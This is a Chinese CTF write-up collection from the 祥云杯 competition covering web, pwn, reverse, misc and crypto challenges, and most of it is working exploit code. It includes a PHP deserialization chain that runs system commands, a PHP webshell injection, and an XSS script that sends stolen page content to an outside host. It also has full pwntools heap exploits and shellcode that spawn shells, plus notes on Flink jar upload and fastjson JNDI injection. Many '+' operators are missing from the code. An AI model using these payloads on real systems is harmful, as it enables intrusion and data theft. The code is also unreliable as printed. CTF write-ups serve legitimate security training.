祥云杯 By 天璇Merak

祥云杯 By 天璇Merak




<?php namespace Codeception\Extension{ use Faker\DefaultGenerator; use GuzzleHttp\Psr7\AppendStream; class RunProcess{ protected $output; private $processes = []; public function __construct(){ $this->processes[]=new DefaultGenerator(new AppendStream()); $this->output=new DefaultGenerator('jiang'); } } echo urlencode(serialize(new RunProcess())); } namespace Faker{ class DefaultGenerator { protected $default; public function __construct($default = null) { $this->default = $default; } } } namespace GuzzleHttp\Psr7{ use Faker\DefaultGenerator; final class AppendStream{ private $streams = []; private $seekable = true; public function __construct(){ $this->streams[]=new CachingStream(); } } final class CachingStream{ private $remoteStream; public function __construct(){ $this->remoteStream=new DefaultGenerator(false); $this->stream=new PumpStream(); } } final class PumpStream{ private $source; private $size=-10; private $buffer; public function __construct(){ $this->buffer=new DefaultGenerator('j'); include("closure/autoload.php"); $a = function(){system('cat /flags_c');phpinfo(); }; $a = \Opis\Closure\serialize($a); $b = unserialize($a); $this->source=$b; } } } 安全检测


import requests from requests import Response from requests.api import head url = "http://eci-2zefgf3p1ush1igogvo9.cloudeci1.ichunqiu.com" s = requests.session() username = "PD9waHAgcGhwaW5mbygpOz8 " sessid = 'c899a0d6935a15da7e42e02b9fe0a16c' headers={"Cookie":F"PHPSESSID={sessid}"} data= { "username":username } res = s.post(f"{url}/login.php",json=data) sessid= s.cookies.get_dict()['PHPSESSID'] print(sessid) payload = f'{sessid}&p=<?=call_user_func("s"."y"."s"."t"."e"."m","/getf"."lag.sh");?>' p = { "url1":payload } res = s.post(f"{url}/check2.php",data=p) print(res.text) res = s.get(f"{url}/preview.php") print(res.text) 层层穿透

第一层是一个Apache Flink的任意jar包上传漏洞,网上有现成的复现,msf生成一个jar上传执行然后就能getshell

进入后查看/etc/hosts发现有内网环境,而且也给出了内网地址,发现内网还存在一个主机,并且开放8080端口,发现存在shiro框架,结合web.jar发现需要登录,以admin 123456登录后发现/admin/test存在json.parse结合fastjson版本可以构造json数据进行JNDI注入






import requests import requests url = "http://eci-2zedk1cbvvahdw0qqutk.cloudeci1.ichunqiu.com:8888/" s = requests.session() def signup(name): signup_url = url 'signin' data = { 'username': name, 'password': name, } tmp = s.post(url=signup_url,data=data) #print(tmp.text) def change(bucket): change_url = url "user/profile" burp0_url = change_url burp0_cookies = {"UM_distinctid": "17b3b13d148148-0b15ca7c6d5376-35607403-1aeaa0-17b3b13d149826", "CNZZDATA155540": "cnzz_eid=1910689585-1628779580-&ntime=1628784980", "connect.sid": "s:UbIPQ4BQWGBQ4Ym1FG3Eqh4c7PPKC2I5.NMUmomM4LvCfTVTOKnXRk+zZD4CnUL7vr6QYNYZGsz4"} burp0_headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "Origin": "", "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36", "Accept": "text/html,application/xhtml xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": "", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9", "Connection": "close"} burp0_data = {"affiliation": "ichunqiu", "age": "20", "bucket": "https://09e8195ebf97db5752c72731c7e75995.oss-cn-beijing.ichunqiu.com/"} tmp = s.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data,allow_redirects=False) print(tmp.status_code) print(tmp.headers['Location']) token = tmp.headers['Location'][19:] burp1_data = {"affiliation": "ichunqiu", "age": "20", "bucket": bucket } tmp = s.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp1_data, allow_redirects=False) ver_url = url 'user/verify?token=' token tmp = s.get(url=ver_url) #print(tmp.text) def vist(): vist_url = url 'user/bucket' tmp = s.get(vist_url) print(tmp.text) signup('crispr1') chage_website = "" change(chage_website) vist()






<script> var xhr = new XMLHttpRequest(); xhr.open('GET', '', true); xhr.setRequestHeader('Content-type', 'application/x-www-form-urlencoded'); xhr.send(); var xhr1 = new XMLHttpRequest(); xhr1.open('GET', 'http://xxxx:3333?res=' xhr.responseText.toString(),true); xhr1.setRequestHeader('Content-type', 'application/x-www-form-urlencoded'); xhr1.send(); </script>




arcs=math.asin((SIN_P[i]-SIN_N[i])/2030) arcc=math.acos((COS_P[i]-COS_N[i])/2030)

然后利用1对arcs 和 arcc来确定我们的象限。

200 200 270 225 160 250 180 90 150 150 200




然后我们可以发现有一个F盘是bitlocker锁住了。通过之前的加密密钥导入可以解锁盘拿到流量包。流量包中包含有一个rar udp流直接提取即可。


给了一个内存。可以从中获取到hint是一个OneClick.exe。可以直接利用vol dump下来。之后我们开始逆向这个东西,发现他是以dot形式写了一个文件进入一个目录。我们利用虚拟机正常执行即可得到。然后我们可以发现他的word里利用010editor和正常word相比多出了一些东西。考虑可能是宏?但是一般宏会有一些特殊的opcode以及定义,考虑单纯是加密的文本,利用xortool一把锁。发现xor密钥是chr(45)得到flag


解密压缩包10w 张图片只有2种考虑转01 ,后续有base解密图片一把梭

import os import tqdm import base64 result='' for i in range(0,129488): filename="{}.png".format(str(i)) if os.path.getsize(filename)==262: result ='0' else: result ='1' from Crypto.Util.number import * result=long_to_bytes(int(result,2)) while(1): try: result=base64.b64decode(result) except: print(result) Pwnnote

先多申请几个chunk,格式化字符串改小top chunk,再申请,利用house of orange造出unsorted bin,再申请一个chunk利用最后一字节固定泄露基址。
然后格式化字符串修改malloc_hook为realloc 12,修改realloc_hook为one_gadget,调整栈桢打one_gadget。

from pwn import* context(os='linux', arch='amd64', log_level='debug') #r = process('./note') r = remote('',25315) libc = ELF('/lib/x86_64-linux-gnu/libc.so.6') def add(size, con): r.sendlineafter('choice: ', str(1)) r.sendlineafter('size: ', str(size)) r.sendlineafter('content: ', con) def say(addr): r.sendlineafter('choice: ', str(2)) r.sendlineafter('say ? ', addr) def show(): r.sendlineafter('choice: ', str(3)) for i in range(14): add(0x100,"aaa") add(0x40, "aaa") r.recvuntil('0x') addr = int(r.recv(12), 16) print hex(addr) fake_size = 0x00 fmt = fmtstr_payload(6,{addr 74: fake_size},write_size='short') print "fmtstr_payload ==> ",fmt say(fmt) add(0x100, 'aaa') r.sendlineafter('choice: ', str(1)) r.sendlineafter('size: ', str(0x10)) r.sendafter('content: ', '\x78') show() r.recvuntil('content:') libc.address = u64(r.recv(6).ljust(8, '\x00'))-344-0x10-libc.symbols['__malloc_hook'] print hex(libc.address) sys_addr = libc.symbols['system'] malloc_hook = libc.symbols['__malloc_hook'] realloc_hook = libc.symbols['__realloc_hook'] realloc = libc.symbols['realloc'] rr = malloc_hook-0x8 one = 0x4527a ogg = libc.address one tar = realloc_hook 2 tar = ogg for i in range(6): off = tar&0xff fmt = fmtstr_payload(6,{rr i: off},write_size='byte') say(fmt) r.sendlineafter('?', '3'*(off-1)) tar = tar>>8 tar = realloc 12 for i in range(6): off = tar&0xff fmt = fmtstr_payload(6,{malloc_hook i: off},write_size='byte') say(fmt) r.sendlineafter('?', '3'*(off-1)) tar = tar>>8 sleep(0.2) r.sendline('1') sleep(0.2) r.sendline('10') r.interactive() #flag{006c45fa-81d5-45eb-8f8c-eb6833daadf5} JigSaw’sCage


from pwn import* context(os='linux', arch='amd64', log_level='debug') #r = process('./JigSAW') r = remote('',10273) libc = ELF('/lib/x86_64-linux-gnu/libc.so.6') def add(idx): r.recvuntil('Choice :') r.sendline(str(1)) r.recvuntil('Index? :') r.sendline(str(idx)) def edit(idx, con): r.recvuntil('Choice :') r.sendline(str(2)) r.recvuntil('Index? :') r.sendline(str(idx)) r.recvuntil('iNput:') r.send(con) def delete(idx): r.recvuntil('Choice :') r.sendline(str(3)) r.recvuntil('Index? :') r.sendline(str(idx)) def test(idx): r.recvuntil('Choice :') r.sendline(str(4)) r.recvuntil('Index? :') r.sendline(str(idx)) def shwo(idx): r.recvuntil('Choice :') r.sendline(str(5)) r.recvuntil('Index? :') r.sendline(str(idx)) r.recvuntil('Name') r.sendline('ayoung') r.recvuntil('Make your Choice:') r.sendline(str(0xe00000000)) add(0) add(1) add(2) add(3) shellcode1 = ''' push 0x67616c66 push rsp pop rdi push 0 pop rdx push 2 pop rax jmp $ 0x13 ''' print (len(asm(shellcode1))) edit(0, asm(shellcode1)) shell2 = ''' syscall push 0 pop rax push 3 pop rdi push rbp pop rsi push 0x50 pop rdx jmp $ 0x13 ''' print (len(asm(shell2))) edit(1, asm(shell2)) shell3 = ''' syscall push 1 push 1 pop rax pop rdi push rbp pop rsi push 0x50 pop rdx syscall ''' print (len(asm(shell3))) edit(2, asm(shell3)) #gdb.attach(r) test(0) r.interactive() #flag{58591d4d-068f-47ed-9305-a65762917b06} PassWordBox_FreeVersion


chunk a (unsorted bin)
chunk b used
chunk c used
伪造chunk c的prevsize位为chunk a b,利用off by null溢出chunk c的preinuse位,free chunk c,发生unlink造成chunk overlap,然后泄露基址再用tcache打free_hook即可。过程中需要避开tcache的影响

from pwn import* context(os='linux', arch='amd64', log_level='debug') #r = process('./pwdFree') r = remote('', 38562) libc = ELF('/lib/x86_64-linux-gnu/libc.so.6') def add(id, len, pwd): r.sendlineafter('Input Your Choice:', str(1)) r.sendlineafter('Input The ID You Want Save:', id) r.sendlineafter('Length Of Your Pwd:', str(len)) r.sendlineafter('Your Pwd:', pwd) def edit(idx, con): r.sendlineafter('Input Your Choice:', str(2)) sleep(0.1) r.sendline(str(idx)) sleep(0.1) r.send(con) def show(idx): r.sendlineafter('Input Your Choice:', str(3)) r.sendlineafter('Which PwdBox You Want Check:', str(idx)) def delete(idx): r.sendlineafter('Input Your Choice:', str(4)) r.sendlineafter('Idx you want 2 Delete:', str(idx)) def decode(str, key): tmp = '' for i in range(len(str)): tmp = chr((ord(str[i]) ^ ord(key[i%8]))) return tmp add('AAAA', 0xf0, '\x00') r.recvuntil('First Add Done.Thx 4 Use. Save ID:') r.recv(32) key = r.recv(8) for i in range(0xe): add('AAAA', 0xf0, decode('B'*0xf0, key)) for i in range(7): delete(9-i) delete(0) delete(1) for i in range(7): add('AAAA', 0xf0, decode('A'*0xf0, key)) add('AAAA', 0xf0, decode('B'*0xf0, key)) #8 add('AAAA', 0xf0, decode('B'*0xf0, key)) #9 for i in range(7): delete(i) delete(8) for i in range(7): add('AAAA', 0xf0, decode('A'*0xf0, key)) delete(9) add('AAAA', 0xf8, decode('A'*0xf0 p16(0x200) '\x00'*0x6, key)) for i in range(4): delete(i) for i in range(3): delete(i 5) delete(4) for i in range(7): add('AAAA', 0xf0, decode('a'*0xf0, key)) add('AAAA', 0xf0, decode('a'*0xf0, key))#7 show(8) r.recvuntil('Pwd is: ') addr = u64( decode((r.recv(6)), key).ljust(8,'\x00') ) libc.address = addr-96-0x10-libc.symbols['__malloc_hook'] print 'libc_base ===> ', hex(libc.address) free_hook = libc.symbols['__free_hook'] sys_addr = libc.symbols['system'] add('AAAA', 0xf0, decode('a'*0xf0, key)) add('AAAA', 0xf0, decode('a'*0xf0, key)) delete(12) delete(11) delete(8) edit(9, p64(free_hook)) add('AAAA', 0xf0, decode('/bin/sh\x00', key)) add('AAAA', 0xf0, decode(p64(sys_addr), key)) delete(8) r.interactive() #flag{2db0e64f-afe1-44d4-9af9-ae138da7bb4b} lemon

在第一个game里,输入 FFFF 即可将flag内容放到栈上

#! /usr/bin/env python # -*- coding: utf-8 -*- from pwn import * import os import sys context(os='linux',arch='amd64') context.log_level = 'debug' # p = process("./lemon_pwn") p = remote("", 34524) libc = ELF('./libc-2.26.so') def chioce(idx): p.sendlineafter(">>>",str(idx)) def get(idx, name, size, data): chioce(1) p.sendlineafter("index of your lemon:",str(idx)) p.sendafter("name your lemon:",name) p.sendlineafter("of message for you lemon: ",str(size)) p.sendafter("Leave your message:",data) def get_err(idx, name, size): chioce(1) p.sendlineafter("index of your lemon:",str(idx)) p.sendafter("name your lemon:",name) p.sendlineafter("of message for you lemon: ",str(size)) def eat(idx): chioce(2) p.sendlineafter("\n",str(idx)) try: p.recvuntil("eat eat eat ") ret = int(p.recvline()[:-4]) heap_addr = hex(ret) log.success("heap_addr : " str(heap_addr)) return ret except: sys.stdout.flush() os.execv(sys.argv[0], sys.argv) def throw(idx): chioce(3) p.recvuntil('\n') p.sendline(str(idx)) def color(idx, data): chioce(4) p.sendlineafter("\n",str(idx)) p.sendafter("\n",data) def init(yes): if yes: p.sendlineafter("game with me?","yes") p.sendlineafter("your lucky number:","FFFF") p.recvuntil("Wow, you get a reward now!") p.sendlineafter("name first:","mark") p.recvuntil("your reward is ") ret = p.recv()[0:5] log.success("stack_name_addr :" str(hex(int(ret,16)))) return int(ret,16) else: p.sendlineafter("game with me?","no") def pwn(): flag = init(1) get(0,"mark",0x240,"aaaaaaa") try: low_addr = str(hex(eat(0))) low_addr = int(low_addr[-6:-3],16) low_addr *= 0x10 except: sys.stdout.flush() os.execv(sys.argv[0], sys.argv) color(0,p64(0)*2 p64(0x100000250) "\x10" p8(low_addr)) throw(0) get(0,"hacker",0x240,p64(0x00)*4 p64(0x7000000)) # tcache_perthread_strcut throw(0) get(1,"pad1",0x50,p8(0x00)*5 p8(0x03) p8(0x0)*2) # 3 times to stdout get(1,p64(0x00) '\xed\x36',0x30,p64(0x00)) # 0x70 tcache chunk try: get(2,"stdout",0x68,p64(0x0)*6 '\x00'*3 p64(0xfbad1800) p64(0x00)*3 '\x00') # gdb.attach(p) except: sys.stdout.flush() os.execv(sys.argv[0], sys.argv) p.recvuntil("\x7f\x00\x00") addr = u64(p.recvuntil("\x7f").ljust(8,'\x00')) log.success("_IO_2_1_stdout_ 131 : " str(hex(addr))) libc_base = addr -131 - libc.sym['_IO_2_1_stdout_'] log.success("libc_base : " str(hex(libc_base))) # gdb.attach(p) malloc_hook = libc_base libc.sym['__malloc_hook'] free_hook = libc_base libc.sym['__free_hook'] log.success("malloc_hook : " str(hex(malloc_hook))) log.success("free_hook : " str(hex(free_hook))) p.recv() #throw(1) p.sendline("3") p.recvuntil('index of your lemon : ') p.sendline(str(1)) environ = libc_base 0x03dd058 log.success("environ : " str(hex(environ))) stdout = libc_base libc.sym['_IO_2_1_stdout_'] log.success("stdout : " str(hex(stdout))) get(1,p64(0x00) p64(stdout-0x33),0x30,p64(0x00)) # 0x70 tcache chunk get(2,"stdout",0x68,p64(0x0)*6 '\x00'*3 p64(0xfbad1800) p64(0x00)*3 p64(environ) p64(environ 0x10)) stack = u64(p.recvuntil('\x7f')[1:7].ljust(8,'\x00')) log.success("stack_base : " str(hex(stack))) flag_addr = stack&0xffffffffff000 flag log.success("flag_addr : " str(hex(flag_addr ))) #throw(1) p.sendline("3") p.recvuntil('index of your lemon : ') p.sendline(str(1)) get(1,p64(0x00) p64(stdout-0x33),0x30,p64(0x00)) # 0x70 tcache chunk get(2,"stdout",0x68,p64(0x0)*6 '\x00'*3 p64(0xfbad1800) p64(0x00)*3 p64(flag_addr-0x100) p64(flag_addr 0x100)) # gdb.attach(p) p.interactive() if __name__ == "__main__": pwn() #flag{f578948e-8b48-494d-a11e-a97b7fbf14ee} PassWordBox_ProVersion

  1. recover存在UAF,unsortedbin泄露libc
  2. largebin attack改大mp.tcache_bins,制造tcache
  3. tcache attack打__free_hook,改system
  4. 释放binsh块,getshell

#coding:utf-8 from pwn import * import subprocess, sys, os from time import sleep sa = lambda x, y: p.sendafter(x, y) sla = lambda x, y: p.sendlineafter(x, y) elf_path = './pwdPro' ip = '' port = 49261 remote_libc_path = './libc.so' context(os='linux', arch='amd64') context.log_level = 'debug' def run(local = 1): global elf global p if local == 1: elf = ELF(elf_path, checksec = False) p = elf.process() else: p = remote(ip, port) def debug(cmd=''): # context.terminal = [] gdb.attach(p,cmd) pause() def one_gadget(filename = remote_libc_path): return map(int, subprocess.check_output(['one_gadget', '--raw', filename]).split(' ')) def str2int(s, info = '', offset = 0): ret = u64(s.ljust(8, '\x00')) - offset success('%s ==> 0x%x'%(info, ret)) return ret def chose(idx): sla('Input Your Choice:\n', str(idx)) def fadd(idx, size, content = '\0'*8 '\n', ID = '\n'): chose(1) sla('Which PwdBox You Want Add:\n', str(idx)) sa('Input The ID You Want Save:', ID) sla('Length Of Your Pwd:', str(size)) sa('Your Pwd:', content) def add(idx, size, content = '\n', ID = '\n'): chose(1) sla('Which PwdBox You Want Add:\n', str(idx)) sa('Input The ID You Want Save:', ID) sla('Length Of Your Pwd:', str(size)) sa('Your Pwd:', key(content)) def edit(idx, content): chose(2) sla('Which PwdBox You Want Edit:\n', str(idx)) sleep(1) p.send(content) def show(idx): chose(3) sla('Which PwdBox You Want Check:\n', str(idx)) def free(idx): chose(4) sla('Idx you want 2 Delete:\n', str(idx)) def recover(idx): chose(5) sla('Idx you want 2 Recover:\n', str(idx)) def key(num): if num == '\n': return '\n' result = '' for i in [num[x:x 8] for x in range(0, len(num), 8)]: result = p64(passwd^u64(i)) return result run(0) fadd(0, 0x628) p.recvuntil('First Add Done.Thx 4 Use. Save ID:') passwd = u64(p.recv(8)) add(1, 0x420) add(2, 0x618) add(3, 0x420) add(11, 0x420) add(12, 0x420) add(13, 0x420) free(0) recover(0) show(0) p.recvuntil('Pwd is: ') libc = ELF(remote_libc_path) libc.address = str2int(key(p.recv(8)), 'libc', libc.sym['__malloc_hook'] 0x10 96) add(4, 0x638) free(2) attack = libc.address 0x1eb280 0x50-0x20 payload = flat(0, attack, 0, attack) edit(0, payload) add(5, 0x638) free(11) free(12) free(13) recover(13) edit(13, p64(libc.sym['__free_hook'])) add(13, 0x420) edit(13, '/bin/sh\0') add(14, 0x420) edit(14, p64(libc.sym['system'])) free(13) # debug() p.interactive() ReDizzy

python= def change(code: str): if “ =” in code: return code.replace(“ =”, “-=”) elif “-=” in code: return code.replace(“-=”, “ =”) elif “^=” in code: return code plain = [-1]*32 plain[0] = ord(“‘“) plain[1] = ord(“<”) plain[2] = -29 plain[3] = -4 plain[4] = 46 plain[5] = 65 plain[6] = 7 plain[7] = 94 plain[8] = 98 plain[9] = -49 plain[10] = -24 plain[11] = -14 plain[12] = -110 plain[13] = 0x80 plain[14] = -30 plain[15] = 54 plain[16] = -76 plain[17] = -78 plain[18] = 103 plain[19] = 119 plain[20] = 15 plain[21] = -10 plain[22] = 13 plain[23] = -74 plain[24] = -19 plain[25] = 28 plain[26] = 101 plain[27] = -118 plain[28] = 7 plain[29] = 83 plain[30] = -90 plain[31] = 102 with open(“code”, “r”)as f: lines = f.readlines() for l in reversed(lines): newCode = change(l.strip()) exec(newCode) flag=’’ for i in range(32): flag =chr(plain[i] & 0xff) print(flag)



其实就是逆一个调用了大量 wincrypt 加密 api 的程序,没啥难的,就是 windows api 实在是太阴间了

首先看 main 函数,大量的初始化操作,然后调用 enc 函数,然后清零


然后就是分析 enc 函数了。enc 函数就只传入了一个指向结构体的指针,所以只跟踪引用了这个结构体的函数就行了

这部分初始化了 key1,使用了 4 个 int,其中 3个为定值,1个为时间戳

这两个函数都引用了 结构体,跟进

发现第一个函数是解 base64编码的公钥,把公钥做 key2

第二个函数用 key2 加密了一些数据,调试发现就是 key1

后面这两个函数就是调用 key1 加密文件,然后把 加密后的文件 加密好的 key1 写到加密好的文件里

所以关键问题就是恢复 key1。因为有 key2 这一坨东西,调试并在本地复现发现 key2 是 rsa 加密,n巨大无法分解,遂放弃

后来终于注意到题目加密的是 bmp 文件,bmp 文件当然有固定的格式,而 key1 又只有一个时间戳不确定,所以爆破时间戳就行了


void decrypt_test(void){ DWORD32 key[4] = { 0x0EC62FB2,0x4B54D44F,0,0x8EB1E721 }; FILE* f; int mode; fopen_s(&f, "I:\\flag.bmp.ctf_crypter", "rb"); BYTE* cipher=(BYTE*)malloc(0xd6830); memset(cipher, 0, 0xd6830); fread(cipher, sizeof(char), 0xd6830, f); for (int i = 1629097200; i < 1629553539; i ) { HCRYPTPROV prov = NULL; HCRYPTHASH hash; HCRYPTKEY aesKey; DWORD length=16; key[2] = i; BYTE head[32]; memset(head, 0, 32); memcpy(head, cipher, 16); if (!CryptAcquireContextA(&prov, NULL, MS_ENH_RSA_AES_PROV_A, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)) { printf("error0\n"); } CryptCreateHash(prov, 0x800Cu, 0, 0, &hash); CryptHashData(hash, (const BYTE*)key, 0x10u, 0); CryptDeriveKey(prov, 0x660Eu, hash, 0, &aesKey); mode = 1; CryptSetKeyParam(aesKey, 4u, (const BYTE*)&mode, 0); CryptSetKeyParam(aesKey, 3u, (const BYTE*)&mode, 0); CryptDecrypt(aesKey, 0, 0, 0, head, &length); if (head[0] == 'B' && head[1] == 'M') { cout << i; break; } } }

void decrypt(void) { DWORD32 key[4] = { 0x0EC62FB2,0x4B54D44F,1629098245,0x8EB1E721 }; FILE f; int mode; fopen_s(&f, “I:\flag.bmp.ctf_crypter”, “rb”); BYTE cipher = (BYTE*)malloc(0xd6830); int totalLength = 0xd6830; DWORD blockLen = 16; memset(cipher, 0, totalLength); fread(cipher, sizeof(char), totalLength, f); HCRYPTPROV prov = NULL; HCRYPTHASH hash; HCRYPTKEY aesKey; if (!CryptAcquireContextA(&prov, NULL, MS_ENH_RSA_AES_PROV_A, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)) { printf("error0\n"); } CryptCreateHash(prov, 0x800Cu, 0, 0, &hash); CryptHashData(hash, (const BYTE)key, 0x10u, 0); CryptDeriveKey(prov, 0x660Eu, hash, 0, &aesKey); mode = 1; CryptSetKeyParam(aesKey, 4u, (const BYTE)&mode, 0); CryptSetKeyParam(aesKey, 3u, (const BYTE*)&mode, 0); for (int i = 0; i < totalLength; i = 16) { CryptDecrypt(aesKey, 0, 0, 0, cipher i, &blockLen); } FILE* out; fopen_s(&out, “dec.bmp”, “wb”); fwrite(cipher, 1, totalLength, out); printf(“”); }

easy apc



然后就可以动调加载dll的程序,在LoadLibrary InjectDll.dll的时候下断点,在Dll的入口点断下就能调试了,发现主要的逻辑就是对AkariDll这个字符串算哈希,然后用rpc和驱动通讯算出一个值key,然后和flag一起参与加密,加密是用rand驱动的,6种加密,然后我们只需要分别逆一下这6种加密就ok,非常简单,都是异或等等,然后随便找一组数据把key的结果加密出来,和真正flag的数据组合在一起反过来用rand调用解密函数回退就能得到flag了




c\equiv g^mw\ mod\ p


# -*- coding: utf-8 -*- from pwn import * import re import random from math import gcd # from Crypto.Util.number import inverse from hashlib import sha256 String = "ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890abcdefghijklmnopqrstuvwxyz" def proof(known, hashcode): for each1 in String: for each2 in String: for each3 in String: for each4 in String: this = each1 each2 each3 each4 known if sha256(this.encode()).hexdigest() == hashcode: # print(each1 each2 each3 each4) return each1 each2 each3 each4 def exgcd(a, b): if b == 0: return 1, 0, a else: x, y, q = exgcd(b, a % b) x, y = y, (x - (a // b) * y) return x, y, q def invert(a,p): x, y, q = exgcd(a,p) if q != 1: raise Exception("No solution.") else: return (x p) % p def enc(n, g, m): while 1: r = random.randint(2, n - 1) if gcd(r, n) == 1: break c = (pow(g, m, n ** 2) * pow(r, n, n ** 2)) % (n ** 2) return c def dec(n, g, LAMBDA, c): L1 = (pow(c, LAMBDA, n ** 2) - 1) // n L2 = (pow(g, LAMBDA, n ** 2) - 1) // n m = (invert(L2, n) * L1) % n return m host, port = "", 57811 keys = {521, 526, 530, 542, 548, 550, 558, 566, 577, 585, 611, 613, 614, 113, 114, 119, 121, 123, 637, 638, 639, 128, 129, 130, 641, 646, 647, 653, 142, 148, 158, 685, 184, 186, 201, 718, 727, 216, 232, 745, 746, 237, 751, 241, 244, 780, 783, 271, 281, 286, 288, 810, 299, 307, 309, 313, 333, 860, 349, 355, 877, 885, 888, 899, 903, 396, 400, 918, 416, 936, 939, 427, 942, 430, 944, 461, 977, 983, 995, 498} index = {530: b'0', 521: b'0', 585: b'0', 899: b'0', 281: b'1', 355: b'0', 128: b'1', 416: b'0', 498: b'0', 944: b'1', 977: b'1', 396: b'1', 550: b'0', 877: b'1', 918: b'1', 333: b'1', 244: b'1', 647: b'1', 611: b'0', 461: b'1', 637: b'0', 614: b'0', 216: b'1', 639: b'0', 727: b'1', 119: b'0', 983: b'0', 237: b'1', 148: b'0', 810: b'1', 130: b'0', 685: b'0', 885: b'0', 114: b'0', 427: b'0', 201: b'1', 860: b'1', 888: b'1', 783: b'0', 646: b'1', 299: b'0', 288: b'0', 653: b'1', 129: b'1', 313: b'0', 558: b'0', 309: b'1', 142: b'0', 745: b'1', 613: b'1', 936: b'1', 548: b'1', 903: b'0', 718: b'0', 158: b'1', 542: b'1', 566: b'0', 400: b'1', 186: b'1', 780: b'1', 577: b'0', 638: b'0', 430: b'1', 641: b'1', 751: b'0', 286: b'1', 995: b'0', 113: b'1', 939: b'0', 746: b'0'} context.log_level = 'debug' while True: try: sh = remote(host, port) data = sh.recvrepeat(1).decode() known, hashcode = re.findall(r'256\(\?\ (.*?)\) == (.*?)\n', data)[0] secret = proof(known, hashcode) sh.sendline(secret.encode()) for _ in range(32): data = sh.recvrepeat(2).decode() n = int(re.findall(r'n = (.*?)\n', data)[0]) g = int(re.findall(r'g = (.*?)\n', data)[0]) sh.sendline(b'123') sh.recv() sh.sendline(b'3') sh.recv() sh.sendline(b'3') data = sh.recvrepeat(1).decode() c = int(re.findall(r'This is a ciphertext.\n(.*?)\n', data)[0]) c2 = c * g % (n ** 2) sh.sendline(str(c2).encode()) data = sh.recvrepeat(1).decode() res = int(re.findall(r'This is the corresponding plaintext.\n(.*?)\n', data)[0]) assert (res - 1) % 9 == 0 this = (res - 1) // 9 if this not in index: sh.sendline(b'0') data = sh.recv().decode() if "Sorry" in data: index[this] = b'1' break else: index[this] = b'0' else: sh.sendline(index[this]) sh.recv() print(index) else: print(sh.recvrepeat(1).decode()) sh.close() break sh.close() except KeyboardInterrupt: raise KeyboardInterrupt except: passRandom_RSA


seeds = [4827, 9522, 552, 880, 7467, 7742, 9425, 4803, 6146, 4366, 1126, 4707, 1138, 2367, 1081, 5577, 4592, 5897, 4565, 2012, 2700, 1331, 9638, 7741, 50, 824, 8321, 7411, 6145, 1271, 7637, 5481, 8474, 2085, 2421, 590, 7733, 9427, 3278, 5361, 1284, 2280, 7001, 8573, 5494, 7431, 2765, 827, 102, 1419, 6528, 735, 5653, 109, 4158, 5877, 5975, 1527, 3027, 9776, 5263, 5211, 1293, 5976, 7759, 3268, 1893, 6546, 4684, 419, 8334, 7621, 1649, 6840, 2975, 8605, 5714, 2709, 1109, 358, 2858, 6868, 2442, 8431, 8316, 5446, 9356, 2817, 2941, 3177, 7388, 4149, 4634, 4316, 5377, 4327, 1774, 6613, 5728, 1751, 8478, 3132, 4680, 3308, 9769, 8341, 1627, 3501, 1046, 2609, 7190, 5706, 3627, 8867, 2458, 607, 642, 5436, 6355, 6326, 1481, 9887, 205, 5511, 537, 8576, 6376, 3619, 6609, 8473, 2139, 3889, 1309, 9878, 2182, 8572, 9275, 5235, 6989, 6592, 4618, 7883, 5702, 3999, 925, 2419, 7838, 3073, 488, 21, 3280, 9915, 3672, 579] res = [55, 5, 183, 192, 103, 32, 211, 116, 102, 120, 118, 54, 120, 145, 185, 254, 77, 144, 70, 54, 193, 73, 64, 0, 79, 244, 190, 23, 215, 187, 53, 176, 27, 138, 42, 89, 158, 254, 159, 133, 78, 11, 155, 163, 145, 248, 14, 179, 23, 226, 220, 201, 5, 71, 241, 195, 75, 191, 237, 108, 141, 141, 185, 76, 7, 113, 191, 48, 135, 139, 100, 83, 212, 242, 21, 143, 255, 164, 146, 119, 173, 255, 140, 193, 173, 2, 224, 205, 68, 10, 77, 180, 24, 23, 196, 205, 108, 28, 243, 80, 140, 4, 98, 76, 217, 70, 208, 202, 78, 177, 124, 10, 168, 165, 223, 105, 157, 152, 48, 152, 51, 133, 190, 202, 136, 204, 44, 33, 58, 4, 196, 219, 71, 150, 68, 162, 175, 218, 173, 19, 201, 100, 100, 85, 201, 24, 59, 186, 46, 130, 147, 219, 22, 81] import random dp = '' for i, each in enumerate(seeds): random.seed(each) for _ in range(i % 4): random.randint(0,255) dp = chr(res[i] ^ random.randint(0,255)) print(dp)

e dp \equiv 1\ (mod\ p-1)\
dp = k(p – 1) 1\
e * dp k – 1 = pk

爆破$k$,求$gcd(n, e * dp k – 1)$解出$p$

from Crypto.Util.number import * n = 81196282992606113591233615204680597645208562279327854026981376917977843644855180528227037752692498558370026353244981467900057157997462760732019372185955846507977456657760125682125104309241802108853618468491463326268016450119817181368743376919334016359137566652069490881871670703767378496685419790016705210391 c = 61505256223993349534474550877787675500827332878941621261477860880689799960938202020614342208518869582019307850789493701589309453566095881294166336673487909221860641809622524813959284722285069755310890972255545436989082654705098907006694780949725756312169019688455553997031840488852954588581160550377081811151 e = 65537 dp = 5372007426161196154405640504110736659190183194052966723076041266610893158678092845450232508793279585163304918807656946147575280063208168816457346755227057 for i in range(e): if GCD(n, int(e * dp i - 1)) > 1: p = GCD(n, int(e * dp i - 1)) q = n // p print(long_to_bytes(pow(c, inverse(e, (p - 1) * (q - 1)), n))) break myRSA

先对$n-1$进行加密,拿到$temp = (x y)(n-1) k_1 k_2$
$k_1 k_2$大概有1041bit讲temp整除$n-1$之后可以得到$x y$的大概值
然后根据大小关系,直接对$x y$开三次根 $ 1$拿到$p q$,拿flag同理直接把 enc_flag 整除$x y$即可拿到正常的c

